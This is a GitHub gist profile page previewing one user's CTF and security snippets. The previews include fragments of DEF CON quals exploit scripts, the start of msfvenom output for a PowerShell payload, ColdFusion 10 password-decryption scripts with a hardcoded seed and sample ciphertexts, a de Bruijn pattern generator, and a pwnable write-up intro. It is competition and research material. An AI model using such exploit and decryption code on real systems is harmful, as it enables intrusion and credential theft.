Skip to content

Instantly share code, notes, and snippets.


Ditmar Wendt dwendt

View GitHub Profile
dwendt /
Last active May 14, 2018
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode =
def p32(v):
return struct.pack(">i",v)
View welp.txt
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
View coldfusion10decrypt.rb
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from
SEED = 'EB3452127614E25A'
def decrypt(cpass)
View coldfusion10decrypt.rb
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn ( on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

dwendt / gist:c25895fde82730b8f17f
Created Mar 25, 2016
SunCTF scores that CTFTime won't accept
View gist:c25895fde82730b8f17f
"standings": [
"id": 393,
"pos": 1,
"score": 1905,
"team": "eipiplus1equals0"
"id": 135,
dwendt /
Created Jul 16, 2015

LegitBS Quals 2015 - thing2 (4pts)

For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution

Prerequisite Knowledge

  • C++ Object Memory Layout (Virtual Function Tables)
  • Windows 64bit ABI / Calling Convention
  • ROP
View gist:5cc5223d4686d0e33209
memoArr = {};
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset
function deBruijn (charset, maxlen, n) {
var k = charset.length;
var a = [];
for (var i = 0; i < k * n; i++) a.push(0);
if (maxlen.toString() in memoArr)
return memoArr[maxlen.toString()];
for (var k in memoArr) {
dwendt / thing2.exe.rb
Created Jun 10, 2015
thing2.exe - legitbs defcon quals 2015 - 4pt pwnable
View thing2.exe.rb
#!/usr/bin/env ruby
require 'socket'
#require 'hexdump'
$dbg = false
$sock ="localhost", 4141)
def recv_until(str)
data = ""
while tmp = $sock.recv(1024) and not tmp.empty?